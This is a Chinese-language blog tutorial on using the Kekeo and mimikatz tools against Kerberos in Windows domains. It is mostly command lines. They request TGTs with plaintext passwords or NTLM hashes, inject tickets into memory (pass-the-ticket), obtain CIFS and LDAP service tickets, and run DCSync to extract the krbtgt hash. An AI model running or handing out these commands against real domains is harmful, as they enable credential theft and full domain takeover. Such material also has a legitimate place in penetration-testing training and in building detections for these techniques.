赞
踩
Kekeo是mimikatz作者Benjamin使用C语言编写的安全工具,
主要是针对Kerberos协议进行攻击的工具,可以发起Kerberos请求,
并将请求票据导入内存中,从而模拟Kerberos协议的各个阶段。
base64:用于input/output对于base64的支持。
tgt:TGT模块
tgs:TGS模块
exploit:攻击模块
misc:杂项模块
kerberos:Kerberos包模块
smb:小型SMB协议
ntlm:NTLM模块
tssp:TSSSP模块
Kekeo的tgt模块可以申请TGT,可以使用明文或者密码哈希进行认证,
可以将票据导出为文件,也可以将票据注入到当前内存中,将TGT导入内存后,
想请求什么服务,系统就回自动利用该TGT请求指定服务的ST。
例子:
dir请求的CIFS服务
DCSYnc请求的是LDAP服务
1.明文密码请求
自动导入票据
(1)Kekeo明文密码自动导入票据
tgt::ask /user:administrator /domain:test.com /password:P@123456 /ptt
(2)Kekeo明文导出票据
tgt::ask /user:administrator /domain:test.com /password:P@123456
mimiktaz导入票据:
mimikatz.exe "kerberos:ptt TGT.kirbi" "exit"
2.密码hash请求
密码哈希申请TGT并导入内存中:
tgt:ask /user:administrator /domain:test.com /ntlm:xxxxx /ptt
密码哈希生成TGT保存到kirbi文件:
tgt::ask /user:administrator /domain:test.com /ntlm:XXXXX
tgs模块用于申请ST,因此需要提供一张TGT,需要先使用Kekeo请求一张TGT,
然后在使用tgs模块使用该TGT请求指定服务的ST,可以将ST导入到内存中,
也可以将ST保存为凭据文件。
一.申请ST并直接注入到内存中步骤
1.使用明文密码或者hash申请TGT
tgt::ask /user:administrator /domain:test.com /ntlm:XXXXX
2.用上一步骤的TGT申请ST,这里请求CIFS票据可以用于dir操作,
如果需要进行Dcsync操作吸引申请LDAP服务。
tgs::ask /tgt:TGT票据 /service:cifs/AD.test.com /ptt //cifs服务
tgs::ask /tgt:TGT票据 /service:ldap/AD.test.com /ptt //ldap服务可以用于Dcsync
mimikatz.exe "lsadump::dcsync /domain:test.com /user:krbtgt /csv "exit"
上述mimikatz进行Dcsync导出krbtgt hash需要注入到内存ldap服务TGS,
二.申请ST并保存为凭据
gs::ask /tgt:TGT票据 /service:cifs/AD.test.com //cifs服务
tgs::ask /tgt:TGT票据 /service:ldap/AD.test.com //ldap服务可以用于Dcsync
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。